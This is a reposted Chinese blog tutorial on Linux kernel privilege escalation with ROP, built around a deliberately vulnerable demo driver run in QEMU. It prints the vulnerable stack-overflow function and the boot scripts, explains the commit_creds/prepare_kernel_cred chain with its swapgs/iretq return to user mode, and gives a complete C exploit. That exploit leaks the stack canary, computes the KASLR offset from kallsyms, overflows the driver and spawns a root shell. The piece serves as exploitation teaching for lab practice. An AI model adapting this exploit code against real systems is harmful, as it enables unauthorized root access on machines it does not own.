linux 内核提权总结(demo+exp分析) -- ROP(一)

最新推荐文章于 2024-08-12 22:28:28 发布
最新推荐文章于 2024-08-12 22:28:28 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: 安全 # Linux内核 Linux 文章标签: 内核 linux 安全
原文链接:https://bbs.pediy.com/thread-261720.htm
版权
Linux 同时被 3 个专栏收录
44 篇文章 7 订阅
订阅专栏
安全
34 篇文章 6 订阅
订阅专栏
Linux内核
20 篇文章 7 订阅
订阅专栏

基础ROP篇(linux 5.0.21)

本文转自网络文章,内容均为非盈利,版权归原作者所有。
转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。
原文作者:jmpcall
专栏地址:https://zhuanlan.kanxue.com/user-815036.htm

 

内核提权与用户态攻击的区别

  • 攻击流程
    • 用户态攻击: 执行 system("/bin/sh") 获得shell
    • 内核提权:
      1. 内核执行 commit_creds(prepare_kernel_cred(0)) 使进程获得root权限
      2. 用户态进程执行system("/bin/sh") 获得root权限 shell
  • 理解难点
    • 内核rop链构造
    • 用户态进程与内核之间的切换

一. 漏洞分析

建议初学者先了解基础的驱动程序知识

1.查看驱动安全机制

checksec rop.ko
 
[*] '/home/povcfe/linux/flod/rop.ko' 
Arch:     amd64-64-little 
RELRO:    No RELRO 
Stack:    Canary found 
NX:       NX enabled 
PIE:      No PIE (0x0)

  • 发现开启canary和NX

2.查看qemu启动脚本boot.sh

  • boot.sh
qemu-system-x86_64 \
-kernel bzImage \
-initrd rootfs.img \
-append "console=ttyS0 root=/dev/ram rdinit=/sbin/init" \
-cpu qemu64 \
-nographic \
-gdb tcp::1234

3.查看开机自启脚本

  • rcS
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
 
echo /sbin/mdev > /proc/sys/kernel/hotplug  # 支持热拔插
/sbin/mdev -s
 
cat /proc/kallsyms > /tmp/kallsyms  # 当/proc/sys/kernel/kptr_restrict=1时,普通用户不能通过/proc/kallsyms读取函数地址,为减少难度直接将kallsyms内容写入临时目录
insmod rop.ko   # 目标驱动
 
chmod 777 /dev/povcfe_dev
chmod 777 /dev/rop_dev 
 
setsid cttyhack setuidgid 1000 sh

4.审计代码

可以发现dangerous函数存在明显的栈溢出漏洞(降低难度直接泄漏canary)

void dangerous(size_t num)
{
    char overflow[0x10] = {0};
    printk(KERN_INFO "canary is 0x%lx", *((size_t *)overflow + 2));
    memcpy(overflow, kernel_buf, num);
    printk(KERN_INFO "%s", overflow);
}

5.利用思路

  • Canary通过printk泄露
  • NX使用rop绕过
  • 读取 /tmp/kallsyms的startup_64(获得内核代码加载基地址,用于定位ROPgadget在内存中的真实地址)
  • 读取 /tmp/kallsyms的commit_creds, prepare_kernel_cred,获得目标内核函数地址

二. ROP链构造

  • 1.内核执行commit_creds(prepare_kernel_cred(0))

    1. 通过/tmp/kallsyms获得 commit_creds() prepare_kernel_cred() 函数地址

    2. 执行 cat tmp/kallsyms | grep startup_64, 如果startup_64不等于0xffffffff81000000, 即内核开启kalsr防护, startup_64与0xffffffff81000000 的差值即为内核基地址偏移(很多发行版默认不打开kalsr, 利用就比较简单了)

    3. 利用ROPgadget获得vmlinux的所有gadget片段(如果效果不理想可换用ropper)

      ROPgadget --binary vmlinux > rop_gadget

      根据所需在rop_gadget中搜索(因为程序开启kalsr,所以 真实地址 = rop_gadget地址 + 基地址偏移)

  • 2.返回用户态

    1. 进入内核前,保存用户态数据

      size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
}

       

    2. 内核切换到用户态

    • 执行swapg 恢复GS值(GS通过宏实现, 并不保存在gs寄存器)
    • 执行iretq 恢复用户态数据(或者执行sysretq 只需提供rip)
      • 需要提前在栈上填充用户态数据(rip,cs,rflags,sp,ss)
      • 填充的用户态数据应在用户态切换到内核态前保存(内联汇编)

  • 3.ROP 链构造

    1. commit_creds() 接收 prepare_kernel_cred(0)的返回值作为参数,即rdi <- rax 时需要灵活变通(手动搜索rop_gadget文件)

      ROP[i++] = 0xffffffff8106b910 + offset; // pop rdi, ret
ROP[i++] = 0x0;
ROP[i++] = prepare_kernel_cred;
 
ROP[i++] = 0xffffffff8105bd21 + offset; // test rcx,rcx ; jne 0xffffffff8105bcc6 ; pop rbp ; ret
ROP[i++] = 0x0;
ROP[i++] = 0xffffffff8110c68a + offset; // mov rdi, rax ; jne 0xffffffff8110c672 ; pop rbp ; ret
ROP[i++] = 0x0;
ROP[i++] = commit_creds;
 
ROP[i++] = 0xffffffff81a00d5e + offset; // swapgs ; popfq ; pop rbp ; ret
ROP[i++] = 0x0;
ROP[i++] = 0x0;
ROP[i++] = 0xffffffff81024b3b + offset; // iretq
 
ROP[i++] = (size_t)get_shell;          // rip
ROP[i++] = user_cs;
ROP[i++] = user_rflags;
ROP[i++] = user_sp;
ROP[i++] = user_ss;

       

三. 结果展示

四. exp

// gcc rop.c -masm=intel -static -o rop
 
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
void get_shell()
{
    if (!getuid())
    {
        puts("=.=");
        system("/bin/sh");
    }
    else
    {
        puts("failed");
    }
    exit(0);
}
 
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    printf("ip is 0x%lx\n", (size_t)get_shell);
    printf("cs is 0x%lx\n", user_cs);
    printf("ss is 0x%lx\n", user_ss);
    printf("sp is 0x%lx\n", user_sp);
    printf("flag is 0x%lx\n", user_rflags);
    puts("status has been saved.");
}
 
size_t get_addr(char *name)
{
    int num = strlen(name) * 2 + 3 + 27;
    char cmd[num];
    memset(cmd, 0, num);
    strcat(cmd, "cat /tmp/kallsyms | grep ");
    strcat(cmd, name);
    strcat(cmd, " > ");
    strcat(cmd, name);
    printf("the cmd is %s\n", cmd);
    system(cmd);
 
    char buf[19] = {0};
    size_t addr = 0;
 
    FILE *fp = fopen(name, "r");
    if (fp == NULL)
    {
        printf("open %s error!\n", name);
        exit(0);
    }
    fgets(buf, 18, fp);
    addr = strtoul(buf, 0, 16);
    printf("the addr(0x) is: %p\n", (void *)addr);
    if (addr == 0)
    {
        puts("string conversion integer failed");
    }
    fclose(fp);
    return addr;
}
 
size_t get_canary()
{
    system("dmesg | grep canary > canary");
    puts("the cmd is: dmesg | grep canary > canary");
    FILE *fp = fopen("canary", "r");
    if (fp == NULL)
    {
        puts("open canary error");
        exit(0);
    }
    char buf[100] = {0};
    size_t canary = 0;
    fgets(buf, 100, fp);
    puts(buf);
    char *str_canary = strstr(buf, "0x");
    puts(str_canary);
    canary = strtoul(str_canary, 0, 16);
    fclose(fp);
    printf("the canary is 0x%lx\n", canary);
 
    return canary;
}
 
char *rop(size_t offset, size_t *ROP, size_t commit_creds, size_t prepare_kernel_cred)
{
    int i = 0;
    ROP[i++] = 0xffffffff8106b910 + offset; // pop rdi, ret
    ROP[i++] = 0x0;
    ROP[i++] = prepare_kernel_cred;
 
    ROP[i++] = 0xffffffff8105bd21 + offset; // test rcx,rcx ; jne 0xffffffff8105bcc6 ; pop rbp ; ret
    ROP[i++] = 0x0;
    ROP[i++] = 0xffffffff8110c68a + offset; // mov rdi, rax ; jne 0xffffffff8110c672 ; pop rbp ; ret
    ROP[i++] = 0x0;
    ROP[i++] = commit_creds;
 
    ROP[i++] = 0xffffffff81a00d5e + offset; // swapgs ; popfq ; pop rbp ; ret
    ROP[i++] = 0x0;
    ROP[i++] = 0x0;
    ROP[i++] = 0xffffffff81024b3b + offset; // iretq
 
    ROP[i++] = (size_t)get_shell;          // rip
    ROP[i++] = user_cs;
    ROP[i++] = user_rflags;
    ROP[i++] = user_sp;
    ROP[i++] = user_ss;
}
 
int main()
{
    size_t base, commit_creds, prepare_kernel_cred;
 
    base = get_addr("startup_64");
    commit_creds = get_addr("commit_creds");
    prepare_kernel_cred = get_addr("prepare_kernel_cred");
    size_t offset = base - 0xffffffff81000000;
    printf("offset 0x%lx\n", offset);
 
    int fd = open("/dev/rop_dev", 2);
    if (0 == fd)
    {
        puts("open /dev/rop_dev error");
        exit(0);
    }
    char payload1[0x10] = {0};
    write(fd, payload1, 0x10);
    write(fd, payload1, 0x10);
    size_t canary = get_canary();
 
    size_t payload2[17] = {0};
    payload2[0] = 0x6161616161616161;
    payload2[1] = 0x6262626262626262;
    payload2[2] = canary;
    payload2[3] = 0x6363636363636363;
    save_status();
    rop(offset, &payload2[4], commit_creds, prepare_kernel_cred);
    write(fd, payload2, 8*21);
    puts("success");
 
    return 0;
}

五. 踩坑记录

  1. 高版本linux canary存在\x00截断(低版本没有)
  2. 使用ROPgadget获得的gadget片段有可能存在于vmlinux的数据区 (不管是代码还是数据在内存中都只是一堆二进制数字), 所以如果内核开启NX保护, 那么内核数据区的gadget就不能用于ROP链构造
  3. 使用iretq从内核态切换至用户态时,出现段错误(用户态数据被正常还原)
    • 解决方案: 将qemu的cpu启动参数由kvm64切换为qemu64
  4. ROPgadget 获得的代码片段中没有iretq和sysretq(1)python 进行iretq编码匹配
    • 原因:ROPgadget工具获得的代码片段作用于程序流程控制,即ret, call 等元素必须存在,但是内核态返回用户态只需执行 iretq指令,与其后接的汇编无关,由此看来,使用ROPgadget工具获得的内容是少于需求的,所以有可能iretq,sysretq, 不存在于获得的代码片段中
    • 解决方案:①python 进行iretq编码匹配;②ida 解析vmlinux 查找iretq指令。
北观止
关注
专栏目录
【权限提升】Linux Sudo权限提升漏洞(CVE-2023-22809)
做自己喜欢的事,并将其发挥到极致!
04-05 8488
sudo 允许系统管理员将权限委托给某些用户(或用户组),能够以ROOT用户或其他用户身份运行部分(或全部)命令。由于Sudo中的sudoedit对处理用户提供的环境变量(如SUDO_EDITOR、VISUAL和EDITOR)中传递的额外参数存在缺陷。当用户指定的编辑器包含绕过sudoers策略的 " –" 参数时,拥有sudoedit访问权限的本地攻击者可通过将任意条目附加到要处理的文件列表中,最终在目标系统上实现权限提升。
0001-TIPS-2020-hxp-kernel-rop : ret2user
06-19
0001-TIPS-2020-hxp-kernel-rop : ret2user
linux 提权总结
weixin_51681694的博客
06-13 7567
会继续补充.....
Linux提权EXP - CVE-2023-0386
潇湘信安的博客
06-22 257
漏洞编号:CVE-2023-0386;漏洞产品: linux kernel - overlay文件系统;影响范围: 5.11 - 5.19;使用条件: 可以取消共享或可以创建覆盖文件系统;利用效果: 本地提权
ROP和Ret2libc漏洞
最新发布
qq_67812668的博客
08-12 936
ROP全称为Return-oriented Programming(返回导向式编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 ROP攻击同缓冲区溢出攻击,格式化字符串漏洞攻击不同,是一种全新的攻击方式,它利用代码复用技术。
Linux Kernel 权限提升漏洞CVE-2023-32233
m0_48722220的博客
08-02 1478
Linux Netfilter 是一个在 Linux 内核中的网络数据包处理框架,也称作 iptables,它可以通过各种规则和过滤器,基于数据包的来源、目标地址、协议类型、端口号等信息,控制网络流量和数据包的转发和处理,是 Linux 系统网络安全性和可靠性的重要组成部分。
【已复现】Linux Kernel权限提升漏洞(CVE-2023-3269)安全风险通告
smellycat000的专栏
08-10 557
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Linux Kernel 权限提升漏洞漏洞编号QVD-2023-15242、CVE-2023-3269公开时间2023-07-05影响对象数量级万级奇安信评级高危CVSS 3.1分数7.8威胁类型权限提升利用可能性中POC状态已公开在野利用状态未发现EXP状态已公开技术细节状态已公开利用条件:需要本地低权限触发。(注:奇安信CERT的漏洞...
信息安全_4Linux内核的花花世界.pptx
08-14
Linux内核提权技术】是信息安全领域中的一个重要话题,特别是在Android内核Linux内核交互日益频繁的今天,这种技术的研究与防范显得至关重要。本文将深入探讨最新的Linux内核提权技术,以及它们在嵌入式设备,...
008.利用堆大小差一错误爆破Linux内核-008.CVE-2016-6187 Exploiting Linux kernel
08-04
SLUB是Linux内核中的一种高效内存分配器,用于管理内核空间中的动态内存分配。它预先分配相同尺寸的对象,存储在称为slab的内存块中。每个slab包含多个对象,且每个对象在释放后,其"next_free"指针指向slab内的下一...
rop-plus:rop框架修改加强版
06-28
2. **数据执行保护(DEP)**:DEP防止非执行内存区域(如堆栈)被当作代码执行,但ROP通过利用返回指令(通常是`ret`)将控制权转移至栈上的gadget序列,从而绕过DEP。 3. **gadgets**:在ROP攻击中,gadgets是指...
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
操作系统权限提升(十八)之Linux提权-内核提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-27 2870
内核提权是利用Linux内核的漏洞进行提权的,内核漏洞进行提权一般包括三个环节:1、对目标系统进行信息收集,获取到系统内核信息及版本信息;2、根据内核版本获取其对应的漏洞以及EXP3、使用找到的EXP对目标系统发起攻击,完成提权操作EXP该怎么着呢,可以用Kali去寻找,kali中自带searchsploit命令可以查找EXP,输入对应的版本号就可以查找相应的漏洞输入就会自动复制该文件到当前目录。
linux 内核提权总结(demo+exp分析) -- 任意读写(一)
北观止的博客
12-23 433
cred篇 每个线程在内核中都对应一个线程结构块thread_info thread_info中存在task_struct类型结构体 struct task_struct中存在cred结构体用来保存线程权限 攻击流程 定位某进程的cred结构体 将cred结构提结构体的uid~fsgid全部覆写为0(前28字节) 原文地址 一. 利用步骤 1. 定位cred结构体 task_struct中存在char comm[TASK_COMM_LEN] co.
Linux 内核安全增强—— stack canary
weixin_71478434的博客
08-30 1559
per-cpu 变量的引入是为了实现per-task的stack canary, 每个cpu上同时只能运行一个进程/线程, per cpu变量可以随进程的切换而切换,故通过一个per-cpu变量完全可以为每个进程/线程解引用到不同的canary地址(后续称为per-cpu canary),以实现per-task的canary.默认stack canary使用全局符号(变量) __stack_chk_guard 作为原始的canary(后续称为全局canary), 在gcc/clang中均使用相同的名字...
通用gadget详解
weixin_44932880的博客
12-26 7386
gadget 利用gadget是做pwn题时控制程序流程一种重要且常用的方法。 rop是什么? 参考链接 https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop-zh/ 我今天主要写我对通用gadget的原理的理解 通用 gadget 通用gadget之所以叫通用,说明这是可以广泛使用的。 本人理解: 程序编译...
初探ROP
KKABqN
03-16 3401
文章目录0x01 前言0x02 什么是ROP0x03 为什么要ROP0x04 基本ROPret2shellcode含义从原理中解析ret2shellcode从例子中解析ret2shellcode发现利用点确定利用前提调试扩展点ret2text含义从例子中解析ret2text发现利用点确定利用前提调试ret2syscall含义从例子中解析ret2syscall的方法细说系统调用在ret2syscal......
Linux下的内存保护机制
小小鱼的博客
08-12 1555
0. 查看二进制文件开启的保护机制 使用 checsec 命令查看,按照pwntools的话就会装上checksec: 1. RELRO 有关RELRO的技术细节 https://hardenedlinux.github.io/2016/11/25/RelRO.html 有关GOT攻击的技术原理参考 http://blog.csdn.net/smalosnail/article/details/53247502 RELOR开启/关闭 gcc -o test test.c
缓解机制linux,缓冲区溢出保护机制——Linux
weixin_31174767的博客
05-14 296
缓冲区溢出保护机制Linuxcanary(栈保护)栈溢出保护是一种缓冲区溢出攻击的缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,该cookie往往放置在ebp/rbp的正上方,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址...
linux内核rop姿势详解,Linux内核ROP姿势详解(二)
weixin_39983350的博客
05-02 459
前言在本教程的第1部分中,我们已经演示了如何为我们的系统(3.13.0-32内核-Ubuntu 12.04.5 LTS)找到有用的ROP gadgets用来构建一个用来提权ROP链。我们还开发了一个易受攻击的内核驱动程序,允许任意代码执行。这部分我们将使用这个内核模块在实践中演示ROP链:提权,修复系统并干净地“退出”到用户态。以下是第1部分的ROP链的要求:执行提权的payload可以引用驻留...
CTF挑战:ARM64内核提权分析与漏洞利用
"CTF babyarm内核题目分析文档主要探讨了一道ARM64架构的Linux内核提权挑战,涉及漏洞分析、利用方法以及解决步骤。该题目基于Linux 5.17.2内核,目标是通过读取root权限的文件来提权。题目启用了KASLR(地址空间...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值